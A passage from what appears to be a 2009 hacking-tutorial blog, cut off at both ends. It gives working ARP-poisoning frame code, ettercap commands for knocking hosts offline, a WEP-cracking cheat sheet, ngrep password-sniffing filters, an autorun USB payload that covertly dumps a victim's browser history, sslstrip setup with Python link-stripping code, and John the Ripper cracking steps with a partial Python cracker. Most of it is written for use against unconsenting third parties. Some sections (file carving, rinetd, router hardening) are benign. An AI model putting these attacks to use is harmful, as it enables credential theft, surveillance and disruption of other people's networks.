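    return build_arp_reply(dst_mac=victim_mac, src_mac=attacker_mac,
                           sender_mac=victim_mac, sender_ip=gateway_ip,
                           target_mac=victim_mac, target_ip=victim_ip)


def parse_arp(frame):
    """Decode a raw Ethernet+ARP frame back into fields (sanity check against Wireshark)."""
    if len(frame) < 42:
        raise ValueError("frame too short for Ethernet + ARP")
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    _htype, _ptype, _hlen, _plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    mac = lambda b: ":".join("%02x" % x for x in b)
    ip = lambda b: ".".join(str(x) for x in b)
    return {
        "dst_mac": mac(frame[0:6]), "src_mac": mac(frame[6:12]), "opcode": opcode,
        "sender_mac": mac(frame[22:28]), "sender_ip": ip(frame[28:32]),
        "target_mac": mac(frame[32:38]), "target_ip": ip(frame[38:42]),
    }


if __name__ == "__main__":
    # made-up addresses: victim, attacker NIC, gateway IP, victim IP
    frame = poison_frame("00:11:22:33:44:55", "66:77:88:99:aa:bb",
                         "192.168.1.1", "192.168.1.103")
    with open("arp_reply", "wb") as f:     # same file name file2cable -f expects
        f.write(frame)
    print(parse_arp(frame))
```

A frame that Wireshark captured will usually be 60 bytes long because Ethernet pads short frames to the minimum size; only the first 42 bytes carry the fields, and the opcode at offset 20 is what distinguishes a reply (2) from a request (1).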

Here is a quick visual from an ARP cache poisoning attack using hexedit and Wireshark to capture and modify an ARP packet: http://www.docstoc.com/docs/9852261/ARP-Spoofing-Tutorial.
It should give you a visual idea of what you have to change when using Wireshark and hexedit together. Note, however, that they perform a different attack from the one I demonstrated here. Once you think you have my example covered, try theirs next to get a good feel for things.

Resources/Good reading:
http://www.docstoc.com/docs/9852261/ARP-Spoofing-Tutorial

Take down any host on a network using Ettercap's plugin Isolate

Ettercap is a very popular password sniffer and packet analyzer. It comes with many plugins built in, including isolate, which I'm going to discuss briefly here. This plugin lets you literally take a host off the network. For example, if you find a user abusing the internet, why not just take him out? The theory behind the attack is poisoning the user's ARP cache. A computer on your LAN that talks to the internet relies on knowing the MAC address of the gateway or router, so it is not hard to imagine what happens if we tell that machine that, to reach the internet, it must send all packets to some other MAC address. More interestingly, say the router's IP address is 192.168.1.1: if we poison the machine's ARP cache so that 192.168.1.1 maps to that computer's own MAC address, the result is a complete denial of service. Whenever the user's machine tries to communicate with the web, all of its packets are sent to its own MAC address. Talk about a state of confusion.

This attack may take up to 5 mins to work. It relies on the arp cache entry to time out before it needs to refresh it self.

# ettercap -Tq -i eth0 -P isolate /192.168.1.103/ //

The above command completely takes the host 192.168.1.103 down. On the Windows machine you can run ipconfig /all and arp -a and compare the MAC addresses: if the gateway's entry now shows the machine's own MAC, you just pwned it. Now you can tell those pesky torrent users, just before you take them down, "Say hello to my lil friend..." Isolate.

Resources/Good reading:
http://wcosughacking.blogspot.com/2008/07/isolate-ip.html

Cracking WEP with aircrack-ng ( cheat sheet)

We should all by now be aware of the famous insecurities of WEP. WEP uses a short (24-bit) initialization vector that is prepended to the static key and reused, which exposes the RC4 key schedule to statistical attacks (FMS, KoreK, PTW), and certain packets, such as ARP frames, are easy to recognise by their fixed size and can be replayed to generate more traffic. The idea behind the attack is to capture enough packets (that is, enough distinct IVs) that a program like aircrack-ng can analyse them and derive the WEP key. We will use the aircrack-ng suite of tools to crack ourselves some WEP. Please perform this attack only on your own network, or on networks you have permission to audit.

[Cheat sheet] using BackTrack 4:

# ifconfig wlan0 down //bring down the wireless interface
# macchanger -r wlan0 //change your MAC address to a random fake one
# ifconfig wlan0 up //bring the wireless interface back up
# airmon-ng start wlan0 //create an interface (mon0) that listens in monitor mode
# airodump-ng mon0 //survey the air for potential WEP targets and note their BSSID and channel
# airodump-ng --bssid "mac_address_of_targetAP" --channel "channel_of_targetAP" -w wep mon0 //capture only the target's packets; -w takes a file name prefix, so the capture lands in wep-01.cap
# aireplay-ng -a "mac_address_of_targetAP" -e "ssid_of_targetAP" -h "your_mac_address" --fakeauth 0 mon0 //fake-authenticate to the access point so it accepts frames from your MAC
# aireplay-ng -a "mac_address_of_targetAP" -e "ssid_of_targetAP" --deauth 10 -c "connected_client_mac_address" mon0 //send deauth packets to disconnect a client; when it reconnects it sends an ARP request we can replay
# aireplay-ng -3 -b "mac_address_of_targetAP" -h "your_mac_address" mon0 //ARP replay attack to generate new IVs quickly
# aircrack-ng -b "mac_address_of_targetAP" wep-01.cap //once there are enough IVs (tens of thousands; the PTW attack typically needs roughly 20,000 to 40,000 for a 40-bit key and more for a 104-bit key), attempt to recover the WEP key

If aircrack-ng fails, leave airodump-ng and the ARP replay running and try again later; it only needs more IVs.

That's it.
Use Google to find out more about the insecurities of WEP.

Saturday, November 28, 2009

Ngrep

Ngrep is a basic packet sniffer whose main feature is the ability to filter network packets by searching (grep) for strings in their payloads and display the matching packets' content in a readable format. Think of it as unix's grep, but run over network streams. Ngrep takes standard tcpdump/BPF filters (host 192.168.1.1, port 80, etc.), and its match expression is a regular expression.

Examples:

# ngrep -d eth0 port 80 // display all port 80 traffic on interface eth0

# ngrep -d eth0 "google.ca" port 80 // search port 80 traffic for the string google.ca

# ngrep -d eth0 "[a-z0-9.-]*\.google\.ca" port 80 // the match expression is a regular expression, not a shell glob, so a leading * is not valid: use [a-z0-9.-]* for "any subdomain" and escape the dots

For better visual output add the "-W byline" option, which prints each line of the payload on its own line.

# ngrep -d eth0 -W byline "msn.com" port 80

To search for more than one string

# ngrep -d eth0 -W byline -i "pass|USER" -n 2 port 80 // searches for the string 'pass' or 'USER'. "-i" ignores case. "-n 2" matches only 2 packets in total (any number can be specified), then exits.

# ngrep -n 2 -q -d eth0 -W byline -wi "pass|USER" port 80 // the same search; "-w" matches the expression only as a whole word, and "-q" (quiet) suppresses the '#' printed for every non-matching packet, so only packet headers and their payloads are shown.

The following can pick out logins to harvest passwords from cleartext HTTP (anything carried over HTTPS is opaque to ngrep):

# ngrep -d eth0 -W byline -i "pass|USER" port 80 | grep -i pass

More examples mimicked from: http://www.brandonhutchinson.com/ngrep.html

Usage examples:
ngrep '' udp (print all UDP packets)
ngrep '' icmp (print all ICMP packets)
ngrep '' port 53 (print TCP or UDP port 53 packets)
ngrep '' tcp port 23 (print TCP port 23 packets)
ngrep 'LILWORLD' port 138 (print Microsoft browsing traffic for NT domain LILWORLD)
ngrep -iq 'rcpt to|mail from' tcp port 25 (monitor current delivery and print sender and recipients)
ngrep 'user' port 110 (monitor POP3)
ngrep -q 'abcd' icmp (Microsoft operating systems fill the ICMP payload with the alphabet; is the "pinging" host running a Microsoft operating system?)
ngrep -iq 'user-agent' tcp port 80 (determine client application that client host is running)
ngrep '220' port 21 (determine version of FTP server)
ngrep 'SSH' port 22 (investigate Secure Shell)
ngrep -v '' port 23 (see all traffic but telnet)

Resources/Good reading:
http://ngrep.sourceforge.net/usage.html
http://www.linux.com/archive/articles/46268
http://www.security-freak.net/tools/ngrep/ngrep.html
http://www.brandonhutchinson.com/ngrep.html

Friday, November 27, 2009

HTTPtunnel, Another way to tunnel your traffic to bypass firewalls

Like the title says, httptunnel lets you create a tunnel (an unencrypted one, I might add) so you can redirect ports or bypass firewalls. It is not the preferred way to tunnel traffic, since it offers no encryption to keep your actions hidden the way SSH tunnelling or stunnel would; the tunnelled data is simply wrapped in HTTP requests and responses. Nevertheless, it is an easy utility to get up and running quickly and works on both Linux and Windows systems.

[server]linux, 10.0.0.1
[client]windows, 10.0.0.2

On the server [linux]:
For this you need some service running locally; we are going to use a web server on port 80. Start the web server and put a demo index.html in its document root so clients are greeted with a page. Then run the httptunnel server as follows:
# ./hts -F 127.0.0.1:80 4444 //Listens on port 4444, and forwards all traffic to itself (127.0.0.1) on port 80

On the client [windows]:

c:\>htc.exe -F 5555 10.0.0.1:4444 //Listens on port 5555 and connects to the awaiting httptunnel server at 10.0.0.1 on port 4444

Now on the client, open a web browser and go to http://127.0.0.1:5555. If everything works, you should be greeted with the web page served from 10.0.0.1; the only thing a firewall between the two sees is HTTP between htc and hts on port 4444.

Resources/Good reading:
http://www.nocrew.org/software/httptunnel.html
http://en.wikipedia.org/wiki/HTTP_tunnel
http://www.neophob.com/serendipity/index.php?/archives/85-GNU-HTTPtunnel-v3.3-Windows-Binaries.html
http://sebsauvage.net/punching/

Foremost

Foremost is a very popular tool in the open source forensics world. It can recover files from practically anything: hard disks, disk images, pcap network captures and memory dumps. It does not interpret the file system; it scans the raw bytes for known headers and footers, so it can recover deleted files (as long as they are stored contiguously) even when the file system metadata is gone. Unfortunately, due to programming difficulties, earlier versions of foremost were limited to processing files smaller than 2 GB; in version 0.69 the maximum carve size was 4 GB. Foremost served as the basis for other file-carving applications such as Scalpel and tcpxtract. The program uses a configuration file (foremost.conf) to specify the headers and footers to search for and carve out.

foremost.conf ships with headers and footers for well-known file types. You are not limited to what is there by default: you can extend it by adding your own headers and footers, or write a custom config file.

# foremost -i file.img -t doc -o /root/Foremost_Dir -c /etc/foremost.conf

'-i': Input file (image). Can also be a drive or partition, e.g. /dev/sda1
'-o': Folder to write the recovered files into
'-t': Type of file to search for. The default is to search for all file types known from its config file.
'-c': [optional] Config file to use. If left out, foremost uses its default config file at /etc/foremost.conf

[Supported file types out the box]['-t']
jpg
gif
png
bmp
avi
exe
mpg
wav
riff
wmv
mov
pdf
ole
doc
zip
rar
htm
cpp
all
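To make the header/footer idea concrete, here is a small carver written for this post. It is not foremost's code and it does not read foremost.conf: the signature table, the constructed sample "image" and the maximum-size handling are all my own, and foremost's real config entries additionally carry a case-sensitivity flag and, for some types, a REVERSE or NEXT footer modifier.

```python
import os

# Constructed signature table in the spirit of foremost.conf entries:
# type -> (header, footer, maximum size to look ahead for the footer)
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9", 20 * 1024 * 1024),
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82", 20 * 1024 * 1024),
    "gif": (b"GIF8", b"\x00\x3b", 5 * 1024 * 1024),
}


def carve(data, types=None):
    """Return a list of (type, offset, bytes) for every header..footer pair found.

    Scans the raw bytes only; no file system knowledge is used, which is why
    carving also recovers deleted (but still contiguous) files."""
    results = []
    for name, (header, footer, max_size) in SIGNATURES.items():
        if types and name not in types:
            continue
        pos = 0
        while True:
            start = data.find(header, pos)
            if start == -1:
                break
            window_end = min(len(data), start + max_size)
            end = data.find(footer, start + len(header), window_end)
            if end == -1:
                # header with no footer within max_size: foremost would still emit
                # a max_size chunk; this example skips it and keeps scanning
                pos = start + 1
                continue
            end += len(footer)
            results.append((name, start, data[start:end]))
            pos = end
    results.sort(key=lambda r: r[1])
    return results


def carve_file(path, out_dir, types=None):
    """Carve an image file on disk and write each hit to out_dir, foremost style."""
    with open(path, "rb") as f:
        data = f.read()
    os.makedirs(out_dir, exist_ok=True)
    written = []
    for name, offset, blob in carve(data, types):
        out = os.path.join(out_dir, "%08d.%s" % (offset, name))
        with open(out, "wb") as f:
            f.write(blob)
        written.append(out)
    return written


# Constructed sample "disk image": zero padding, a tiny JPEG-like blob,
# more padding, a tiny GIF-like blob. Not real image data.
SAMPLE_IMAGE = (b"\x00" * 16
                + b"\xff\xd8\xff\xe0JFIF...\xff\xd9"
                + b"\x00" * 8
                + b"GIF89a\x01\x00\x01\x00\x00\x3b"
                + b"\x00" * 8)

if __name__ == "__main__":
    for name, offset, blob in carve(SAMPLE_IMAGE):
        print("%s at offset %d, %d bytes" % (name, offset, len(blob)))
```

The JPEG case also shows the classic carving pitfall: a JPEG with an embedded thumbnail contains a second FF D9 before the real end, so a naive footer search truncates the file. foremost has the same limitation, which is one reason to verify carved files with a viewer or file(1).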

As mentioned earlier, Scalpel is based on foremost. Scalpel is more efficient and faster than foremost, and foremost's authors have recommended that practitioners use Scalpel instead.

Resources/Good reading:
http://www.forensicswiki.org/wiki/Foremost
http://www.forensicswiki.org/wiki/Scalpel
http://www.forensicswiki.org/wiki/Tcpxtract

10 Steps to securing a wirless router, by synjunkie

I got this from another blog and find the information very helpful and comprehensive. It doesn't teach you how to configure a particular router, but it tells you the things you should know and check for when setting up your own wireless router. Use it as a checklist, if you will, for not getting pwned by your inquisitive neighbours.

The following was taken from synjunkies blog:
http://synjunkie.blogspot.com/2009/02/10-steps-to-securing-wireless-router.html

1. Upgrade Firmware

It's always a good idea to keep firmware as up to date as possible as the vendor may have fixed known vulnerabilities or bugs since the hardware shipped. As a bonus you might even get a bit more functionality thrown in as well with the firmware upgrade. It's also a good idea to check the vendor's site every couple of months for updates.


2. Change the default Password

Obviously!


3. Turn off Wireless Administration

This will prevent anyone who is not physically plugged into the network from administering the wireless router.


4. Enable Encryption

Enable the best encryption possible. WPA2 is preferred but if the connecting devices only support WEP then WEP it is. Just be aware that WEP is crap and it can be cracked in seconds. Ensure that whatever encryption you use it has a long random key. There are plenty of random key generators available so use them.


5. Change & Hide the Default SSID

Don't leave your default SSID as Linksys or Belkin. Change it to something unique but not something that identifies it as your network, such as “Bob Scratchets House”. Even after hiding the SSID it is possible for an attacker to view it but it is another layer in your defense strategy.


6. Apply MAC Address Filtering

Each device that has a wireless card in will have a MAC address. Apply MAC address filtering so only devices with the specified MAC addresses can connect using wireless to you router. This can be bypassed but it's another hurdle to make a potential attacker jump through.


7. Disable UPnP

Universal Plug and Play is a method by which software can open up ports on the router to allow external hosts to communicate through the router with a host on the LAN. This can also be used by malware to open up the router to allow a route in. By disabling UPnP you will need to enable port forwarding when required.


8. Configure the DHCP Settings

If your router allows you to change your DHCP scope you may want to set it to hand out addresses from a range other than the default, such as the 172.16.x.x range. Also by limiting the amount of addresses to the number of hosts you have it might provide an early warning system if someone does manage to bypass your security and hop onto your wireless LAN.


9. Configure DNS Settings

Point your DNS to a provider such as OpenDNS and utilise their free services. OpenDNS can be used to block specific types of sites such as File Sharing or Pornography and also to log where computers from your LAN are going to. It will also block your computer from visiting known bad sites. Another important note, when the DNS flaw was released to the public by Dan Kaminsky at Blackhat 08, OpenDNS was one of the first DNS providers to provide protection. At the time of this post many ISPs are still vulnerable.


10. Enable Logging

If your router allows you to enable logging it is worthwhile doing so. By familiarising yourself with the logs regularly you will get to recognise what is normal and what is not. But remember, logs are only useful if you check them!

The functions I have raised in these 10 steps are those that should be available on most consumer grade routers. If you have a router that does have more functionality such as allowing you to use HTTPS to access the administrative interface then that's great, use it.

Get familiar with what your router can do and know where to look to check settings such as port forwarding. And once you have set up the router and gotten it working well, save the config and store it somewhere safe and secure such as in a Truecrypt volume or in an encrypted disk image.

::
==================================================
::

Very interesting and informative checklist. The closing sentences add some complexity by storing config files in TrueCrypt volumes or encrypted disk images. Although that is good practice (and most likely mandatory) in high-security environments, the average user doesn't, and most likely wouldn't be too concerned about, backing up config files to secure locations. They probably know what encryption is but don't know how to use it to their own benefit, and probably wouldn't bother with the hassle of learning. For those who are interested in learning about encrypting their data, I'm going to do a post on TrueCrypt in the near future, showing how you can keep your data and router configs in an encrypted volume.

Resources/Good reading:
http://synjunkie.blogspot.com/2009/02/10-steps-to-securing-wireless-router.html

Rinetd, redirector

This program seems to be losing some of its buzz but is still noteworthy in my opinion. It is not a complex program to use or learn. Its main function is to redirect TCP connections from one IP address and port to another. It can handle any number of connections to the address/port pairs specified in its config file, located at /etc/rinetd.conf. Rinetd cannot redirect FTP, because FTP requires more than one socket (the data connection is negotiated separately).

Typical Forwarding rule in rinetd.conf:
[Syntax]
bindaddress bindport connectaddress connectport

For example:

201.21.21.21 80 10.0.0.2 80

Would redirect all connections to port 80 of the public IP address 201.21.21.21 to port 80 of the address 10.0.0.2, which would typically be a machine inside the firewall with no direct route to the outside world. This rule only answers on the one interface that holds the public address (the network card connected to the modem). If the server has multiple interfaces, it is sometimes preferable to answer on all of them:

0.0.0.0 80 10.0.0.2 80

Would redirect all connections to port 80 for all ip addresses assigned to the server

You can also allow and deny specific clients, or clients in a subnet, from using the redirector. The '?' wildcard matches any one character, while '*' matches any number of characters, including zero. If any allow rules are present, a client must match one of them; a matching deny rule always wins.

allow 201.21.21.21 // allow one specific address
allow 201.21.21.11? // allow the range of addresses matching 201.21.21.110-119
allow 201.21.21.* // allow all addresses in the class C network 201.21.21.0-255

After you have customized your config file, to run the server run:

# rinetd

If you have a few custom config files you can specify which one to use.

# rinetd -c /etc/my_custom_config.conf

It might be useful to have logs, and by default rinetd doesn't produce any. To activate logging, add the following line to the configuration file:

logfile logfile_location

example:

logfile /var/log/rinetd.log

By default, rinetd logs in a simple tab-delimited format containing the following information:
Date and time
Client address
Listening host
Listening port
Forwarded-to host
Forwarded-to port
Bytes received from client
Bytes sent to client
Result message
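To show what a redirector of this kind actually does, here is a minimal one written in Python for this post. It is not rinetd's code: it parses the same rule syntax shown above (forwarding lines, allow/deny with the ? and * wildcards, logfile), applies the access rules to the connecting client's address, and relays bytes in both directions on a thread per connection. The config text in the __main__ block is made up, and the log format only approximates rinetd's tab-separated one.

```python
import fnmatch
import socket
import threading


def rule_matches(pattern, ip):
    """rinetd-style wildcard: '?' = exactly one character, '*' = any run (even empty)."""
    # fnmatch has the same '?' and '*' semantics; escape '[' so it stays literal
    return fnmatch.fnmatchcase(ip, pattern.replace("[", "[[]"))


def parse_config(text):
    """Parse rinetd.conf syntax: 'bindaddr bindport connectaddr connectport',
    'allow <pattern>', 'deny <pattern>', 'logfile <path>', '#' comments."""
    cfg = {"forwards": [], "allow": [], "deny": [], "logfile": None}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if parts[0] in ("allow", "deny") and len(parts) == 2:
            cfg[parts[0]].append(parts[1])
        elif parts[0] == "logfile" and len(parts) == 2:
            cfg["logfile"] = parts[1]
        elif len(parts) == 4:
            bind_addr, bind_port, conn_addr, conn_port = parts
            cfg["forwards"].append((bind_addr, int(bind_port), conn_addr, int(conn_port)))
        else:
            raise ValueError("unparsable rinetd line: %r" % raw)
    return cfg


def client_permitted(cfg, ip):
    """If any allow rules exist the client must match one; a deny match always wins."""
    if any(rule_matches(p, ip) for p in cfg["deny"]):
        return False
    if cfg["allow"]:
        return any(rule_matches(p, ip) for p in cfg["allow"])
    return True


def _pump(src, dst):
    """Copy bytes src -> dst until EOF, then half-close dst so the peer sees EOF too."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def serve(cfg, bind_addr, bind_port, conn_addr, conn_port, log=print):
    """Accept on bind_addr:bind_port, check the client against the rules, and relay
    every permitted connection to conn_addr:conn_port (one pair of threads each)."""
    listener = socket.socket()
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((bind_addr, bind_port))
    listener.listen(16)
    while True:
        client, (cip, _cport) = listener.accept()
        if not client_permitted(cfg, cip):
            log("%s\t%s\t%d\tdenied" % (cip, bind_addr, bind_port))
            client.close()
            continue
        try:
            upstream = socket.create_connection((conn_addr, conn_port))
        except OSError as e:
            log("%s\t%s\t%d\tconnect-failed %s" % (cip, conn_addr, conn_port, e))
            client.close()
            continue
        log("%s\t%s\t%d\t%s\t%d\topened" % (cip, bind_addr, bind_port, conn_addr, conn_port))
        threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
        threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()


if __name__ == "__main__":
    # made-up config: expose an internal web server on all local addresses,
    # but only to one /24 plus one extra host
    CONF = "0.0.0.0 8080 10.0.0.2 80\nallow 10.0.0.*\nallow 201.21.21.21\n"
    cfg = parse_config(CONF)
    for fwd in cfg["forwards"]:
        serve(cfg, *fwd)
```

Note that the access check is on the source IP only, which is exactly as strong as rinetd's: anyone who can spoof or occupy a permitted address gets through, so treat allow rules as a convenience, not authentication.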

Thursday, November 26, 2009

USB Hack

There are many USB hacks on the web, each with its own abilities and purposes. The idea behind the hack is to make use of the autorun feature that many Windows systems employ. This means that when you plug in a USB stick (one capable of autorun; see U3 drives), it can automatically run a program or script. So you can be at a coffee shop, turn around to buy some coffee and leave your computer unattended for a minute, and in that time a malicious user can plug his thumb drive into your system for 5 seconds and acquire valuable information such as passwords and browser history. That's it: 5 seconds and you get pwned.

This project is mostly used on customizable U3 drives, but it can be made to work with regular thumb drives with one difference: it is not fully automatic. When you plug in the drive you are prompted with an AutoPlay dialog, and one click on the 'Open' button runs your script or executable. For our demo we will use a regular thumb drive to simulate the attack, on Windows.

Files you will need:
[nircmd.exe] : http://www.nirsoft.net/utils/nircmd.zip
[iehv.exe] (NirSoft IE History Viewer) : http://www.nirsoft.net/utils/iehv.zip
[drive.ico]: Just an icon I used. Use any icon and rename it to drive.ico

Open up notepad and type the following. Save the file as Autorun.inf:

[AutoRun]
OPEN=nircmd.exe execmd iehv.exe /stext iehv.txt
ICON=drive.ico
ACTION=Start my application

Copy iehv.exe, nircmd.exe, drive.ico and Autorun.inf to a freshly formatted thumb drive. Voila, you are finished. The Autorun.inf causes a prompt to appear when you plug the thumb drive into a Windows system. nircmd.exe is a handy multi-purpose command-line utility that we use to run iehv.exe quietly (its execmd command hides the console window that would otherwise pop up for a command-line tool). iehv.exe is a small utility that does one thing well: dump Internet Explorer's browsing history, here to a text file with /stext.

To execute the attack (if you haven't figured the rest out already), all you do is plug the USB drive into a Windows system. An AutoPlay prompt appears asking you to open the drive. Click Open and iehv.exe does its job in the background. Within 5 seconds you can unplug the drive and take it with you. When you open the drive there will be a text file, iehv.txt, holding the browsing history of your target. This method can be extended with scripts and other executables; I'll leave some examples of that in the resources section. One caveat: this relies on AutoPlay honouring Autorun.inf on removable drives, which Windows XP does by default; later versions of Windows ignore Autorun.inf on USB storage, so there the drive will only appear as ordinary storage.

Resourses/Good reading:
http://www.nirsoft.net
http://www.usbhacks.com/
http://wiki.hak5.org/wiki/USB_Switchblade
http://portableapps.com/node/5221

Attack on SSL with SSLstrip

There is a lot of controversy around this tool, mainly because of its ability to put a large number of noobs at your ankles. Yes, this tool is serious business. I was reading the sslstrip page of its author, Moxie Marlinspike, and read that the research he published got his PayPal account suspended. He presented his work at one of the world's best-known hacker conferences, Black Hat 2009, and posted statistics on the over 500 users whose credentials he was able to steal, including passwords and credit card numbers. The most important highlight of those stats was that none of those users knew they had been pwned. It was completely transparent to them.

SSLStrip-0.6:
This tool does not perform a generic man-in-the-middle attack on SSL the way tools such as ettercap or Cain & Abel do. Those tools rely on the user accepting a fake certificate in their web browser, which most of them still do. With sslstrip, the wow factor is that the attack is almost entirely transparent to the average user: the browser never sees a certificate warning because it never makes an HTTPS connection at all. According to the author, "sslstrip will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links". Version 0.5 added support for supplying a favicon that looks like a lock icon, selective logging, and session denial.


There is a decent explanation of how it works on the author's website, which I am mostly going to mirror here with minor changes for clarity.

Requirements

  • Python >= 2.4 (apt-get install python)
  • The Python "twisted-web" module (apt-get install python-twisted-web)
Or, if you have BackTrack 4 like I do, you don't need to worry about the above.

Setup

  • # tar zxvf sslstrip-0.5.tar.gz //extract the contents of the compressed archive
  • # cd sslstrip-0.5
  • (Optional) # sudo python ./setup.py install //installs to the appropriate directories. Not a necessity; it already runs out of the box.

Running sslstrip

  • Flip your machine into forwarding mode. (# echo "1" > /proc/sys/net/ipv4/ip_forward)
  • Set up iptables to redirect HTTP traffic to sslstrip. (# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>; sslstrip listens on 10000 by default)
  • Run ettercap to perform the ARP spoof, sniff passwords on the fly and display them in real time. (# ettercap -Tq -i eth0 -M ARP:remote /10.0.0.2/ /10.0.0.1/)
  • Run sslstrip. (# sslstrip.py -l <listenPort>)

That's all there is to the magic. To test it, go to a website like Facebook from the victim machine and log in with some credentials (correct or incorrect), then take a look at ettercap's interface. Notice anything confidential that Facebook and nobody else should be allowed to know? AHHH. One caveat: a browser that already knows a site via HTTP Strict Transport Security (HSTS) or a preload list will refuse the plain HTTP downgrade for that site, so on modern browsers this works only against sites without HSTS or on a first visit.
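To show what the "watch for HTTPS links and redirects, then map those links into look-alike HTTP links" part actually involves, here is a simplified illustration written in Python for this post. It is not sslstrip's code: it rewrites https:// links in a response body and in a Location header to http://, drops the Secure flag from cookies so the browser keeps sending them over the downgraded connection, and remembers which host/path pairs it stripped so that the proxy knows to fetch the victim's later plain-HTTP requests over HTTPS upstream. The HTML and headers used in the usage block are constructed samples.

```python
import re
from urllib.parse import urlsplit

# absolute https:// URLs as they appear in HTML/JS: host, optional port, optional path
HTTPS_URL = re.compile(rb"https://([A-Za-z0-9.\-]+)(:\d+)?(/[^\s\"'<>]*)?", re.I)


class Stripper:
    """State the downgrading proxy needs: which requests must be upgraded upstream."""

    def __init__(self):
        self.secure = set()   # (host, request-target prefix) pairs that were stripped

    def strip_html(self, body):
        """Rewrite every https:// link in a response body to http:// and record it."""
        def repl(m):
            host = m.group(1).decode("ascii", "replace").lower()
            target = (m.group(3) or b"/").decode("ascii", "replace")
            self.secure.add((host, target))
            return b"http://" + m.group(1) + (m.group(2) or b"") + (m.group(3) or b"")
        return HTTPS_URL.sub(repl, body)

    def rewrite_response_headers(self, headers):
        """Downgrade a redirect to https:// (the 'redirects' case) and strip the
        Secure flag from cookies so the browser still sends them over plain HTTP."""
        out = {}
        for name, value in headers.items():
            if name.lower() == "location" and value.lower().startswith("https://"):
                parts = urlsplit(value)
                self.secure.add((parts.hostname.lower(), parts.path or "/"))
                value = "http://" + value[len("https://"):]
            elif name.lower() == "set-cookie":
                value = re.sub(r";\s*secure(?=;|$)", "", value, flags=re.I)
            out[name] = value
        return out

    def upstream_scheme(self, host, target):
        """For a plain-HTTP request from the victim, decide whether the proxy must
        fetch it over HTTPS (because we stripped that link) or plain HTTP."""
        host = host.lower()
        for h, prefix in self.secure:
            if h == host and target.startswith(prefix):
                return "https"
        return "http"


if __name__ == "__main__":
    s = Stripper()
    # constructed sample page and response headers
    page = b'<a href="https://login.example.com/auth?x=1">Login</a> <a href="http://example.com/">home</a>'
    print(s.strip_html(page))
    print(s.rewrite_response_headers({"Location": "https://bank.example.com/home",
                                      "Set-Cookie": "sid=1; Secure; HttpOnly"}))
    print(s.upstream_scheme("login.example.com", "/auth?x=1"))
```

The defence is the mirror image of the bookkeeping above: a site that sends Strict-Transport-Security, or is on the browser's preload list, never gets a plain-HTTP first request to rewrite, and a Secure cookie is never offered to a stripped page.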

Here's a nice video by John Strand demonstrating this attack: http://www.vimeo.com/3970303 (SSLStrip from John Strand on Vimeo).


Resources/Good reading:
http://www.thoughtcrime.org/software/sslstrip/
http://www.vimeo.com/3970303

Cracking passwords with John the Ripper

John the Ripper is a free, fast and portable password cracker. It runs on over 10 platforms, including Linux/Unix, DOS and Windows, and handles various password hash formats: Unix crypt flavours (based on DES, MD5 or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hashes.

Attack types: Dictionary and Brute force

Taken from wikipdea: http://en.wikipedia.org/wiki/John_the_Ripper

One of the modes John can use is the dictionary attack. It takes text string samples (usually from a file, called a wordlist, containing words found in a dictionary), encrypting it in the same format as the password being examined (including both the encryption algorithm and key), and comparing the output to the encrypted string. It can also perform a variety of alterations to the dictionary words and try these. Many of these alterations are also used in John's single attack mode, which modifies an associated plaintext (such as a username with an encrypted password) and checks the variations against the encrypted hashes.

John also offers a brute force mode. In this type of attack, the program goes through all the possible plaintexts, hashing each one and comparing it to the input hash. John uses character frequency tables to try plaintexts containing more frequently-used characters first. This method is useful for cracking passwords which do not appear in dictionary wordlists, but it does take a long time to run.

This demo assumes you have already acquired the hashes from a Windows system (hashes.txt in this example, in pwdump format) and a wordlist (readily available on the web; use Google):

# ./john --wordlist=mywordlist.txt hashes.txt
Loaded 2 password hashes with no different salts (LM DES [128/128 BS SSE2])
(Guest)
MYPASS (admin)
guesses:2 time: 0:00:00:00 100% c/s 1298k trying: ANOS - ANYONE

As you can see, the Guest account has a blank password, while the admin account's password is 'mypass' (LM hashes are case-insensitive, which is why John prints it in upper case). John cracked these in under a second with my chosen wordlist. Remember, a dictionary attack only finds the password if it is in the wordlist, so take your time choosing a good one and tailor it based on your initial profiling of the target.

UPDATE:
When cracking raw MD5 or SHA1 hashes, John needs the hash file in "user:hash" form; a file containing only the bare hash will not load. Also note that raw (unsalted) MD5 support comes with the jumbo build, where you select it with --format=raw-md5.

eg:
# echo -n "mypass" | openssl dgst -md5 > hash.txt

The above writes the hash prefixed with "(stdin)= ", which John does not read either. Edit hash.txt so the line is a username, a colon (:), then the 32 hex characters of the hash (admin:<hash>). John will then load the file and attempt to crack it.

You can also expand a wordlist with John's word-mangling rules and print the candidates instead of cracking (useful for building a bigger wordlist for another tool):

# ./john --wordlist=mylist.txt --rules --stdout
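As an added illustration (my own Python for this post, not John's code or its rule language), here is the dictionary attack described above run against a raw MD5 "user:hash" file, with a handful of mangling rules of the kind --rules applies: capitalisation, reversal, appended digits and symbols, and simple leet substitutions. The hash lines and the wordlist are constructed for the example; the hashes are computed inline from their plaintexts so the demo is self-contained.

```python
import hashlib


def parse_hash_file(text):
    """Parse 'user:hash' lines (the format the UPDATE above says John wants)."""
    targets = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue                      # a bare hash with no user is skipped
        user, digest = line.split(":", 1)
        targets[user] = digest.strip().lower()
    return targets


def mangle(word):
    """Yield the word plus simple variants, in the spirit of John's --rules."""
    yield word
    yield word.capitalize()
    yield word.upper()
    yield word[::-1]
    for suffix in ("1", "123", "!", "2009"):
        yield word + suffix
        yield word.capitalize() + suffix
    leet = word.replace("a", "@").replace("e", "3").replace("o", "0").replace("i", "1")
    if leet != word:
        yield leet


def expand_wordlist(words):
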